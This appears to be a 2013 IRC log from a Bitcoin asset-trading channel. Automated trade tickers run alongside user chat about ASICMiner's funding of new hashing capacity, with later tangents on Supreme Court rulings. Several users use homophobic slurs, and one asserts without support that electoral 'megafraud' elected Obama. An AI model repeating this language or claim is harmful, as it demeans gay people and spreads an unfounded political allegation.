27 02:58:30 http://www.reddit.com/r/AskReddit/comments/1h4gma/people_with_dark_humor_what_is_the_absolutely/ Jun 27 03:00:43 ;;seen mircea_popescu Jun 27 03:00:43 mircea_popescu was last seen in #bitcoin-assets 11 hours, 27 minutes, and 21 seconds ago: yea. Jun 27 03:01:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199999 BTC [+] Jun 27 03:01:22 [HAVELOCK] [ASICM] 1 @ 0.03419999 BTC [-] Jun 27 03:02:58 [BTCTC] [TAT.ASICMINER] 8 @ 0.0346 = 0.2768 BTC [+] Jun 27 03:03:20 [HAVELOCK] [ASICM] 2 @ 0.03419999 = 0.0684 BTC [-] Jun 27 03:03:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.034622 = 0.2424 BTC [+] Jun 27 03:06:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.03462 = 0.2077 BTC [-] Jun 27 03:07:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.03462 = 0.1385 BTC [-] Jun 27 03:08:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [-] Jun 27 03:09:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03462 BTC [+] Jun 27 03:09:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.03462 BTC [+] Jun 27 03:09:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.03462 = 0.6924 BTC [+] Jun 27 03:11:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.03462 = 0.6924 BTC [+] Jun 27 03:12:29 [BTCTC] [S.DICE-PT] 89 @ 0.002049 = 0.1824 BTC [-] Jun 27 03:12:31 [BTCTC] [S.DICE-PT] 5 @ 0.002048 = 0.0102 BTC [-] Jun 27 03:12:31 [BTCTC] [S.DICE-PT] 7 @ 0.002048 = 0.0143 BTC [-] Jun 27 03:13:11 [BTCTC] [BASIC-MINING] 2 @ 1.95 = 3.9 BTC [+] Jun 27 03:14:23 what's the new big thing folks? Jun 27 03:16:30 [BTCTC] [RSM] 1 @ 0.021005 BTC [-] Jun 27 03:16:32 [BTCTC] [RSM] 1 @ 0.021004 BTC [-] Jun 27 03:16:42 [BTCTC] [TAT.ASICMINER] 9 @ 0.03462 = 0.3116 BTC [+] Jun 27 03:17:28 [BTCTC] [TAT.ASICMINER] 24 @ 0.03462 = 0.8309 BTC [+] Jun 27 03:19:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.034622 = 0.1731 BTC [+] Jun 27 03:19:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.034622 BTC [+] Jun 27 03:19:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.034622 BTC [+] Jun 27 03:20:19 [BTCTC] [COGNITIVE] 1 @ 0.365749 BTC [-] Jun 27 03:20:21 [BTCTC] [COGNITIVE] 1 @ 0.365751 BTC [+] Jun 27 03:20:22 [BTCTC] [COGNITIVE] 1 @ 0.365754 BTC [+] Jun 27 03:21:12 [BTCTC] [S.DICE-PT] 8 @ 0.002359 = 0.0189 BTC [+] Jun 27 03:21:37 [BTCTC] [TAT.ASICMINER] 20 @ 0.032 = 0.64 BTC [-] Jun 27 03:23:27 [HAVELOCK] [ASICM] 3 @ 0.034 = 0.102 BTC [-] Jun 27 03:24:37 nothing much. Jun 27 03:25:45 [BTCTC] [BASIC-MINING] 8 @ 1.95 = 15.6 BTC [+] Jun 27 03:27:02 [BTCTC] [TAT.ASICMINER] 71 @ 0.03461 = 2.4573 BTC [+] Jun 27 03:27:15 j-dice is old news Jun 27 03:27:23 lol Jun 27 03:27:28 s.deuce jumped the shark Jun 27 03:27:29 whats the next big thing Jun 27 03:28:09 dub were you the dude in the video from the bitcoin conference asking Nefario if he had ever you know like, talked to some lawyers about GLBSE? Jun 27 03:28:20 next big thing is usagi getting btctc approval Jun 27 03:28:22 [BTCTC] [RSM] 1 @ 0.024099 BTC [+] Jun 27 03:28:24 [BTCTC] [RSM] 1 @ 0.024099 BTC [+] Jun 27 03:28:31 Bugpowder: negative Jun 27 03:28:43 oh Jun 27 03:28:47 mp lied! Jun 27 03:29:02 dirty old mp Jun 27 03:29:10 [BTCTC] [RSM] 6 @ 0.024 = 0.144 BTC [-] Jun 27 03:30:18 which shares? Jun 27 03:30:18 [BTCTC] [RSM] 4 @ 0.0241 = 0.0964 BTC [+] Jun 27 03:30:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.03461 = 0.1038 BTC [+] Jun 27 03:31:16 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [-] Jun 27 03:31:56 [BTCTC] [DMS.MINING] 11 @ 0.020999 = 0.231 BTC [-] Jun 27 03:32:23 Diablo-D3 link ?! Jun 27 03:32:37 duh i thought it was you. Jun 27 03:32:46 da fuck was it, because they at some point SAID SO in chan, back then Jun 27 03:33:04 like "duh, no wonder, i was there and asked him about it and he obviously disdn't have a clue" Jun 27 03:35:24 mircea_popescu: link for what? Jun 27 03:35:34 usagi/new pietilla sock suit ? Jun 27 03:35:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.03461 = 0.0692 BTC [+] Jun 27 03:37:12 dub : Jun 27 03:37:13 Oct 05 06:40:34 B0g4r7: there was a thread started by a guy who claimed to have claled the sec lawyer the letter came from, who asked him questions about GLBSE Jun 27 03:37:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.03461 = 0.1384 BTC [+] Jun 27 03:37:45 my rusty memory :D Jun 27 03:39:41 I really like that guy that asked the questions Jun 27 03:39:43 so funny Jun 27 03:40:28 i have no idea who it is, turns out. Jun 27 03:40:40 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Jun 27 03:41:16 [HAVELOCK] [ASICM] 35 @ 0.034 = 1.19 BTC [-] Jun 27 03:42:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.03461 = 0.1731 BTC [+] Jun 27 03:43:48 [HAVELOCK] [ASICM] 5 @ 0.034 = 0.17 BTC [-] Jun 27 03:43:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [+] Jun 27 03:46:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [+] Jun 27 03:47:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [+] Jun 27 03:50:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03461 = 0.1038 BTC [+] Jun 27 03:51:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.03461 = 0.1731 BTC [+] Jun 27 03:51:56 [BTCTC] [ASICMINER-PT] 1 @ 3.42201 BTC [-] Jun 27 03:53:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03461 = 0.0692 BTC [+] Jun 27 03:53:34 [BTCTC] [TAT.ASICMINER] 39 @ 0.03461 = 1.3498 BTC [+] Jun 27 03:54:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.0346 = 0.1384 BTC [-] Jun 27 03:55:08 [BTCTC] [DMS.PURCHASE] 26 @ 0.053794 = 1.3986 BTC [-] Jun 27 03:55:32 [BTCTC] [ASICMINER-PT] 1 @ 3.4739 BTC [+] Jun 27 03:57:39 oh man Jun 27 03:57:49 turner just lost 80BTC Jun 27 03:57:50 [BTCTC] [PAJKA.BOND] 1 @ 0.069 BTC [-] Jun 27 03:57:53 on JD Jun 27 03:59:18 when does JD IPO Jun 27 03:59:46 [BTCTC] [ASICMINER-PT] 1 @ 3.474 BTC [+] Jun 27 03:59:52 it has already Jun 27 03:59:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0346 BTC [-] Jun 27 04:00:02 it is an IPO Jun 27 04:00:18 PPO Jun 27 04:00:33 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [-] Jun 27 04:00:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jun 27 04:01:21 preferred provider organization? Jun 27 04:03:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.0346 = 0.0692 BTC [-] Jun 27 04:06:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.0346 = 0.2076 BTC [-] Jun 27 04:07:14 pff. Coinroll all the way. Jun 27 04:07:26 [BTCTC] [ASICMINER-PT] 1 @ 3.4738 BTC [-] Jun 27 04:07:52 re what was said ~40 minutes ago Jun 27 04:08:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.0346 = 0.2768 BTC [-] Jun 27 04:08:53 usagi: it'd be nice if amazingrando does come back Jun 27 04:09:10 I'd be so surprised about that... Jun 27 04:10:03 [BTCTC] [COGNITIVE] 1 @ 0.384999 BTC [+] Jun 27 04:10:49 [BTCTC] [BASIC-MINING] 1 @ 1.9899 BTC [+] Jun 27 04:11:31 Eh, for now it's all rumors as far as I'm concerned. Haven't heard anything official. Jun 27 04:12:22 [BTCTC] [DMS.MINING] 10 @ 0.019349 = 0.1935 BTC [-] Jun 27 04:12:50 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [-] Jun 27 04:13:33 [BTCTC] [ASICMINER-PT] 1 @ 3.43 BTC [-] Jun 27 04:13:37 [BTCTC] [DMS.MINING] 40 @ 0.019349 = 0.774 BTC [-] Jun 27 04:13:42 Redrobin should have proceeded with legal actions. Jun 27 04:16:04 That is if redrobin or whatever he says is legit. Jun 27 04:17:04 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [-] Jun 27 04:18:41 [BTCTC] [BASIC-MINING] 1 @ 1.99 BTC [+] Jun 27 04:18:43 [BTCTC] [BASIC-MINING] 2 @ 1.99 = 3.98 BTC [+] Jun 27 04:19:16 http://trilema.com/2013/a-compedium-of-compressed-bitcoin-points/ Jun 27 04:19:19 A compedium of compressed Bitcoin points pe Trilema - Un blog de Mircea Popescu. Jun 27 04:19:27 [HAVELOCK] [HIM] 1 @ 0.2851 BTC [-] Jun 27 04:20:29 [HAVELOCK] [ASICM] 9 @ 0.034 = 0.306 BTC [-] Jun 27 04:21:19 Atlantis . silk road for litecoin .just saw it on flipboard Jun 27 04:21:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.0346 = 1.73 BTC [-] Jun 27 04:21:52 im sure they wouldn't take bitcoin. Jun 27 04:22:38 [BTCTC] [COGNITIVE] 2 @ 0.385 = 0.77 BTC [+] Jun 27 04:22:40 [BTCTC] [COGNITIVE] 5 @ 0.389 = 1.945 BTC [+] Jun 27 04:22:41 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [+] Jun 27 04:22:47 [BTCTC] [COGNITIVE] 2 @ 0.3999 = 0.7998 BTC [+] Jun 27 04:22:49 [BTCTC] [COGNITIVE] 10 @ 0.39999 = 3.9999 BTC [+] Jun 27 04:22:50 [BTCTC] [COGNITIVE] 10 @ 0.39999 = 3.9999 BTC [+] Jun 27 04:22:58 [BTCTC] [DMS.MINING] 2 @ 0.02099 = 0.042 BTC [+] Jun 27 04:23:54 [BTCTC] [COGNITIVE] 40 @ 0.4 = 16 BTC [+] Jun 27 04:23:56 [BTCTC] [COGNITIVE] 10 @ 0.4 = 4 BTC [+] Jun 27 04:24:19 netflix needs to take fucking bitcoin Jun 27 04:24:22 and put more shit back on the air Jun 27 04:24:51 [BTCTC] [TAT.ASICMINER] 51 @ 0.03461 = 1.7651 BTC [+] Jun 27 04:26:44 [BTCTC] [ASICMINER-PT] 1 @ 3.472 BTC [+] Jun 27 04:27:47 [BTCTC] [TAT.ASICMINER] 29 @ 0.03461 = 1.0037 BTC [+] Jun 27 04:28:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.03461 = 0.1731 BTC [+] Jun 27 04:29:00 [BTCTC] [ASICMINER-PT] 2 @ 3.472 = 6.944 BTC [+] Jun 27 04:31:38 [BTCTC] [ASICMINER-PT] 1 @ 3.15 BTC [-] Jun 27 04:34:43 [HAVELOCK] [HIM] 16 @ 0.299999 = 4.8 BTC [+] Jun 27 04:37:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.03451 = 0.138 BTC [-] Jun 27 04:41:36 [BTCTC] [PAJKA.BOND] 1 @ 0.05285 BTC [-] Jun 27 04:42:35 [BTCTC] [PAJKA.BOND] 10 @ 0.052844 = 0.5284 BTC [-] Jun 27 04:43:08 [BTCTC] [PAJKA.BOND] 5 @ 0.052843 = 0.2642 BTC [-] Jun 27 04:43:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.034487 = 0.1035 BTC [-] Jun 27 04:43:48 thestringpuller: yes please Jun 27 04:45:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0341 BTC [-] Jun 27 04:46:28 [BTCTC] [TAT.ASICMINER] 30 @ 0.034497 = 1.0349 BTC [+] Jun 27 04:46:55 mircea_popescu: that grey you're quiting in is mostly invisible Jun 27 04:47:01 quoting* Jun 27 04:47:40 [BTCTC] [ASICMINER-PT] 1 @ 3.473 BTC [+] Jun 27 04:47:41 kinda deliberately you know ? Jun 27 04:47:50 [BTCTC] [ASICMINER-PT] 3 @ 3.421046 = 10.2631 BTC [-] Jun 27 04:47:52 [BTCTC] [ASICMINER-PT] 2 @ 3.421013 = 6.842 BTC [-] Jun 27 04:48:14 [HAVELOCK] [ASICM] 1 @ 0.03390003 BTC [-] Jun 27 04:48:50 [HAVELOCK] [ASICM] 2 @ 0.03390002 = 0.0678 BTC [-] Jun 27 04:48:57 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [-] Jun 27 04:49:06 [HAVELOCK] [ASICM] 40 @ 0.03375 = 1.35 BTC [-] Jun 27 04:49:14 [HAVELOCK] [ASICM] 75 @ 0.0337 = 2.5275 BTC [-] Jun 27 04:49:24 [HAVELOCK] [ASICM] 82 @ 0.0337 = 2.7634 BTC [-] Jun 27 04:49:36 [HAVELOCK] [ASICM] 18 @ 0.0337 = 0.6066 BTC [-] Jun 27 04:49:44 [HAVELOCK] [ASICM] 82 @ 0.03350001 = 2.747 BTC [-] Jun 27 04:50:49 [BTCTC] [TAT.ASICMINER] 11 @ 0.034491 = 0.3794 BTC [-] Jun 27 04:50:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.034491 BTC [-] Jun 27 04:51:27 [HAVELOCK] [ASICM] 1 @ 0.034 BTC [+] Jun 27 04:52:04 [BTCTC] [BASIC-MINING] 2 @ 1.99 = 3.98 BTC [+] Jun 27 04:52:05 [BTCTC] [BASIC-MINING] 5 @ 1.99 = 9.95 BTC [+] Jun 27 04:52:05 well its annoying Jun 27 04:52:20 having to highlight shit to read it Jun 27 04:52:48 the idea is that it's meaningless/ignorable but sorry! Jun 27 04:53:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.034488 = 0.1035 BTC [-] Jun 27 04:53:49 [BTCTC] [BASIC-MINING] 2 @ 2 = 4 BTC [+] Jun 27 04:54:21 [BTCTC] [TAT.ASICMINER] 31 @ 0.034004 = 1.0541 BTC [-] Jun 27 04:54:41 I know this will spark some hate... https://bitcointalk.org/index.php?topic=241415.msg2590370#msg2590370 Jun 27 04:56:40 such a dead horse. Jun 27 04:57:44 Well, it still moves when I kick it... Jun 27 04:58:06 resilient horse Jun 27 04:58:40 [BTCTC] [COGNITIVE] 1 @ 0.4 BTC [+] Jun 27 04:59:06 [BTCTC] [DMS.MINING] 28 @ 0.020954 = 0.5867 BTC [-] Jun 27 05:00:09 [MPEX] [S.MPOE] 6729 @ 0.00081691 = 5.497 BTC [+] Jun 27 05:00:11 [MPEX] [S.MPOE] 2092 @ 0.00081819 = 1.7117 BTC [+] Jun 27 05:00:27 [MPEX] [S.MPOE] 3532 @ 0.00081835 = 2.8904 BTC [+] Jun 27 05:01:43 [BTCTC] [TAT.ASICMINER] 28 @ 0.03448 = 0.9654 BTC [+] Jun 27 05:02:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.03448 = 0.1034 BTC [+] Jun 27 05:05:02 furuknap i think you might actually be the horse and the kicker in this case Jun 27 05:05:24 [BTCTC] [ASICMINER-PT] 1 @ 3.421005 BTC [-] Jun 27 05:06:04 Hah :-) Jun 27 05:07:25 [BTCTC] [BASIC-MINING] 1 @ 2.09 BTC [+] Jun 27 05:08:41 also i think the 200th for AM night already be paid for. Jun 27 05:09:00 no way to know Jun 27 05:09:06 ;;bcstats Jun 27 05:09:08 Current Blocks: 243509 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 426 blocks | Next Difficulty In About: 2 days, 13 hours, 35 minutes, and 25 seconds | Next Difficulty Estimate: 20960725.3943 | Estimated Percent Change: 8.38433 Jun 27 05:09:17 i suspect they sold it Jun 27 05:09:30 but china, so... Jun 27 05:10:08 if they sold it nethadh woulf look much diff no? Jun 27 05:10:15 [BTCTC] [COGNITIVE] 3 @ 0.4 = 1.2 BTC [+] Jun 27 05:10:16 ;;nethash Jun 27 05:10:17 162516.596501 Jun 27 05:10:19 [MPEX] [O.USD.C107T] 183 @ 0.06306559 = 11.541 BTC [-] Jun 27 05:10:49 there is that Jun 27 05:11:20 they certainly talked about already having paid for 200th Jun 27 05:11:40 on top of the initial stuff Jun 27 05:12:05 no Jun 27 05:12:12 The 200TH will cost $2 million USD. Where is that taken from? Jun 27 05:12:14 I like very expensive whiskey though Jun 27 05:12:18 so having money is nice Jun 27 05:12:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.03447 = 0.0689 BTC [-] Jun 27 05:12:52 drugs are good too Jun 27 05:13:02 At 15% of nethash, AM generates 16K BTC/month. $2million is 1.25 months of all dividends. Jun 27 05:14:04 furuknap: where do you see the price of 200th? Jun 27 05:14:06 friedcat said in March or April that he withheld dividends to pay for the extra 50TH. Jun 27 05:14:20 friedcat has said they pay $10K per THs. Jun 27 05:14:31 I'll find the quote for you if you need. Jun 27 05:14:44 alcohol better than what drugs? Jun 27 05:14:57 alcohol is the worst drug Jun 27 05:16:45 [BTCTC] [DMS.SELLING] 96 @ 0.034 = 3.264 BTC [+] Jun 27 05:16:47 [BTCTC] [COGNITIVE] 10 @ 0.4 = 4 BTC [+] Jun 27 05:17:18 furuknap: no need Jun 27 05:17:26 [BTCTC] [DMS.MINING] 11 @ 0.02 = 0.22 BTC [-] Jun 27 05:17:28 [BTCTC] [DMS.MINING] 19 @ 0.02 = 0.38 BTC [-] Jun 27 05:17:39 furuknap: I had the impression they paid for 200th, could be wrong Jun 27 05:18:09 They may, but I certainly can't find when, with their massive dividend payouts, they could have held back that amount of BTC. Jun 27 05:18:34 [BTCTC] [DMS.PURCHASE] 85 @ 0.053794 = 4.5725 BTC [-] Jun 27 05:19:02 Of course, they could have gotten a much better deal on this batch, but it wasn't clear from the quote from friedcat whether $10K/THs was future or past prices. Jun 27 05:19:08 dude. Jun 27 05:19:17 you're discussing some side remarks some guy made on a forum Jun 27 05:19:22 that's no sort of basis. Jun 27 05:19:42 at any rate, its not the best reason to be bearish about AM by any streth Jun 27 05:19:53 stretch* Jun 27 05:20:36 [BTCTC] [TAT.VIRTUALMINE] 68 @ 0.004605 = 0.3131 BTC [-] Jun 27 05:20:43 what you guys think about AMC Jun 27 05:21:10 Some guy? You mean friedcat? Jun 27 05:21:12 scam Jun 27 05:21:41 inb4 kslaughter is usagi Jun 27 05:22:51 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [+] Jun 27 05:23:15 First week's normal dividends paid. The balance payment of the next batch, as well as the premium for a full-mask to guarantee our quantity production (200 TH/s or more, depending on how well BTC/USD could do) within the next three months, are partly taken from this week's revenue and the next week's. So the dividends within these two weeks are lower than normal. Jun 27 05:23:40 -friedcat, mar 27 Jun 27 05:23:52 that doesnt actually say paid for 200th Jun 27 05:23:55 the premium for a full-mask. Not boards, not chips... Jun 27 05:24:07 it says secured quantity of production Jun 27 05:25:45 "The final margin cost for 1TH/s is less than 10k$, the actual number depends on the volatile price of PCB components. " https://bitcointalk.org/index.php?topic=99497.msg2013118#msg2013118 Jun 27 05:26:03 dude Jun 27 05:26:09 That's from May 3, so they've gotten a better price, but not sure how much. Jun 27 05:26:20 apr 3 Jun 27 05:26:28 This week is our most spending-intensive one. We have paid for: Jun 27 05:26:28 The premium of a full mask (75% of the total price) Jun 27 05:26:28 The premium of 100 wafers (50% of the total price) Jun 27 05:26:28 Most balance payment of the 50TH/s batch's components Jun 27 05:26:28 We also reserved the coins for: Jun 27 05:26:29 The premium of half-month electricity usage in the new place Jun 27 05:26:29 The balance payment of assembly Jun 27 05:26:30 There won't be more spending besides further wafer & device production and operating cost, which will be much less per week. The next projected big spending is the full mask of our next generation of chips, with the taping-out date undecided yet. Jun 27 05:27:08 There won't be more spending besides further wafer & device production and operating cost <--- This... Jun 27 05:27:29 which will be much less per week Jun 27 05:27:40 dont cut it off for your convenience Jun 27 05:27:46 ...than the 50TH/s they paid for in that update. Jun 27 05:28:18 Most balance payment of the 50TH/s batch's components Jun 27 05:28:23 seems pretty clesr that the only noticeable withholding will be for fen2 Jun 27 05:28:26 I'm guessing he would mention it if it were 200TH not 50TH. Jun 27 05:28:33 gen2 Jun 27 05:29:00 he probly holds back coins every week now Jun 27 05:29:07 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [+] Jun 27 05:29:17 in a complete vacume of information I'm guessing he would have mentioned' Jun 27 05:29:36 have u seen his shareholders Jun 27 05:29:43 this discussion is pointless Jun 27 05:29:54 That may be, but in total, he would have to hold back, regardless of when, a total of 1.25 months of full dividends. If it has happened, great, but then I can't understand why he would need to hold back divs to pay for the 10K USB miners. Jun 27 05:29:55 indeed Jun 27 05:30:08 truff1es: troll better Jun 27 05:30:26 we got sucked into furuknap logic hole Jun 27 05:30:50 [BTCTC] [TAT.ASICMINER] 62 @ 0.034451 = 2.136 BTC [-] Jun 27 05:31:22 AMC to 1btc Jun 27 05:33:06 tbh this is the first time I've looked at the AMC thread Jun 27 05:33:11 BTW, one final point. In the May 3 response, friedcat was responding to my question: "What are the funding requirements to reach those goals [of 62+200THs] and how will that funding take place?" The final margin cost for 1TH/s is less than 10k$, the actual number depends on the volatile price of PCB components. Jun 27 05:33:19 I don't even need to read teh OP to know its a failure Jun 27 05:33:45 lets see what the news is tomorrow Jun 27 05:34:05 its either a retarded child or usagi Jun 27 05:34:18 its a manchild Jun 27 05:34:42 whom literally designed a remote blowjob machine Jun 27 05:34:43 [continued] Installing and power bill are currently low. We will be self-funded. Jun 27 05:35:15 Self-funded either means they will take dividends from investors, have already done so, or are fotting the bill out of the kindsness of their hearts. Jun 27 05:35:20 *footing Jun 27 05:35:30 *bleh* Spelling is for suckers. Jun 27 05:35:52 surely you have it all figured out Jun 27 05:36:04 [BTCTC] [TAT.ASICMINER] 33 @ 0.034451 = 1.1369 BTC [-] Jun 27 05:36:27 I have no idea, but I'm leaning towards it not being paid for as of yet. Jun 27 05:37:50 of course you are cuz you sold your AM at 1.73 or whatever Jun 27 05:38:23 ThickAsThieves: I never thanked you for not buying mine at that price :) Jun 27 05:38:25 I did, because that's the point where I found that AM did no longer have fundamental value support. Jun 27 05:38:28 if you were still holding youd argue the opposite Jun 27 05:38:29 ThickAsThieves: thanks! Jun 27 05:38:37 hehe Jun 27 05:38:49 If I were still holding, I'd be a hipocrate, to myself most of all. Jun 27 05:38:54 as always procrastination pays off Jun 27 05:39:21 furuknap: I've been calling AM a bad deal for a lot longer than you just been too lazy to ditch it Jun 27 05:39:24 sitting on hands is a mastertrader skill Jun 27 05:39:57 [BTCTC] [DMS.MINING] 11 @ 0.02 = 0.22 BTC [-] Jun 27 05:40:02 Considering the funds I got from AM has financed better trades, sitting on hands would have been an idiot's skill. Jun 27 05:41:04 grats on your success Jun 27 05:41:20 TY. Jun 27 05:42:06 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [+] Jun 27 05:42:27 [BTCTC] [PAJKA.BOND] 1 @ 0.0689 BTC [+] Jun 27 05:44:01 [BTCTC] [COG.F] 2 @ 3.99 = 7.98 BTC [+] Jun 27 05:44:17 [BTCTC] [TAT.ASICMINER] 5 @ 0.03456 = 0.1728 BTC [+] Jun 27 05:45:20 [BTCTC] [DMS.SELLING] 16 @ 0.0335 = 0.536 BTC [-] Jun 27 05:45:27 [HAVELOCK] [ASICM] 8 @ 0.034 = 0.272 BTC [+] Jun 27 05:45:31 [HAVELOCK] [HIM] 1 @ 0.298999 BTC [-] Jun 27 05:49:36 [BTCTC] [S.DICE-PT] 6 @ 0.0021 = 0.0126 BTC [-] Jun 27 05:50:11 [BTCTC] [PAJKA.BOND] 1 @ 0.06889 BTC [-] Jun 27 05:52:17 [BTCTC] [ASICMINER-PT] 6 @ 3.430005 = 20.58 BTC [+] Jun 27 05:53:36 [BTCTC] [DMS.MINING] 20 @ 0.020867 = 0.4173 BTC [+] Jun 27 05:54:06 anyone read the scalia dissent btw ? Jun 27 05:55:05 havent Jun 27 05:55:12 http://www.motherjones.com/politics/2013/06/same-sex-marriage-supreme-court-scalia-dissent Jun 27 05:55:16 The Best (or Worst) Lines From Scalia's Angry Dissent on the Supreme Court's Defense of Marriage Act Jun 27 05:56:29 [BTCTC] [BASIC-MINING] 1 @ 2.18 BTC [+] Jun 27 05:56:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.03456 = 0.1037 BTC [+] Jun 27 05:58:33 guy's pissed. Jun 27 05:59:43 [BTCTC] [TAT.VIRTUALMINE] 68 @ 0.005159 = 0.3508 BTC [+] Jun 27 05:59:45 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.005198 = 0.1819 BTC [+] Jun 27 06:00:12 so if i understand correctly, his problem is with how it happened, not that it happened? Jun 27 06:00:33 it's the traditional way he phrases his dissents. Jun 27 06:01:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.03456 = 0.1037 BTC [+] Jun 27 06:05:53 why do people care so much about homosecuals anyway? Jun 27 06:05:55 x Jun 27 06:06:07 http://rt.com/usa/california-man-13-prison-banks-237/ Jun 27 06:06:12 that's pretty good. Jun 27 06:06:15 did is a dinosaur Jun 27 06:06:19 Jeff Olson, the 40-year-old man who is being prosecuted for scrawling anti-megabank messages on sidewalks in water-soluble chalk last year now faces a 13-year jail sentence. A judge has barred his attorney from mentioning freedom of speech during trial. Jun 27 06:06:19 dude* Jun 27 06:06:31 [BTCTC] [DMS.MINING] 74 @ 0.02088 = 1.5451 BTC [+] Jun 27 06:06:49 awesome Jun 27 06:07:25 13 year jail sentence… yeah right Jun 27 06:07:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.03456 BTC [+] Jun 27 06:07:51 i stopped using BoA years ago Jun 27 06:07:57 scammers Jun 27 06:08:03 i still don't get this. hiow the fuck does the judge bar counsel from bringing arguments. Jun 27 06:08:14 that's a mistrial right there, as presented. Jun 27 06:08:19 i suspect the press is a little confuseled. Jun 27 06:08:40 waste of taxpayer money too Jun 27 06:08:43 judge does what judge wants derp Jun 27 06:09:05 [BTCTC] [S.MPOE-PT] 9 @ 0.001 = 0.009 BTC [-] Jun 27 06:09:11 yes, but if what the judge wants is a blowjob that particular verdict isn't going far. Jun 27 06:09:14 [BTCTC] [TAT.ASICMINER] 25 @ 0.03456 = 0.864 BTC [+] Jun 27 06:10:07 [HAVELOCK] [ASICM] 4 @ 0.034 = 0.136 BTC [+] Jun 27 06:10:08 Tosdal, who exited the courtroom shortly after his client, seemed equally bewildered. Jun 27 06:10:08 "I've never heard that before, that a court can prohibit an argument of First Amendment rights," said Tosdal. Jun 27 06:10:13 makes two i guess. Jun 27 06:10:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00462 BTC [-] Jun 27 06:10:39 so skimming that, I can't tell if this judge is pro or anti fag marriage Jun 27 06:10:54 Scalia? Jun 27 06:11:21 Scalia is ultra-conservative Jun 27 06:11:33 me either, but i think thats on purpose Jun 27 06:11:50 he has a problem with judicial oversight of government? Jun 27 06:11:57 thats soem caveman shit Jun 27 06:12:06 dub scalia is famous for having dissented a while back when they struck down the no fags in texas laws Jun 27 06:12:07 when it suits his opinion Jun 27 06:12:16 saying something like "one day you'll be marring the faggits!" Jun 27 06:13:11 Struck down the Voting Rights Act that ensures black people don't get fucked out of their vote in the south, earlier in the week. Was for judicial power on that one. Jun 27 06:13:34 [BTCTC] [TAT.ASICMINER] 23 @ 0.0345 = 0.7935 BTC [-] Jun 27 06:13:36 did not cite a constitutional section in the judgement Jun 27 06:13:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.0344 = 0.1032 BTC [-] Jun 27 06:13:43 i think what scalia is saying is, if homosexuals want a "real" win, it needs to be on grounds good enough that he has no argument worth dissenting over Jun 27 06:13:58 then conservatives can rest knowning nothing could have been done Jun 27 06:14:02 that's a nutso criteria. Jun 27 06:14:10 just get eskimobob or tiberius or w/e in the court. Jun 27 06:14:47 heh, that helps actually Jun 27 06:14:50 Bugpowder afaik the issue with voting rights act were more along the lines of the sort of megafraud that got obama elected than anything Jun 27 06:14:57 [BTCTC] [TAT.ASICMINER] 98 @ 0.034016 = 3.3336 BTC [-] Jun 27 06:15:02 s/scalia/e-bob and it makes perfect sense Jun 27 06:15:07 all depends on your perspective Jun 27 06:15:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.034015 BTC [-] Jun 27 06:15:47 i guess so. Jun 27 06:16:27 but if the perspective is "no man with a right to vote shall be denied that right even if it means fifty billion men without such a right get to vote anyway" Jun 27 06:16:35 then it's kinda meaningless to even hold a ballot. Jun 27 06:16:46 just do a forum poll. Jun 27 06:17:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.034 = 0.068 BTC [-] Jun 27 06:17:18 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [-] Jun 27 06:17:20 [MPEX] [S.MPOE] 9050 @ 0.00081905 = 7.4124 BTC [+] Jun 27 06:17:40 [BTCTC] [ASICMINER-PT] 1 @ 3.463989 BTC [+] Jun 27 06:17:59 GS Elevator Gossip ‏@GSElevator 10h Jun 27 06:18:00 #1: If you can't get your shit together enough to have a single valid photo ID, why should you be 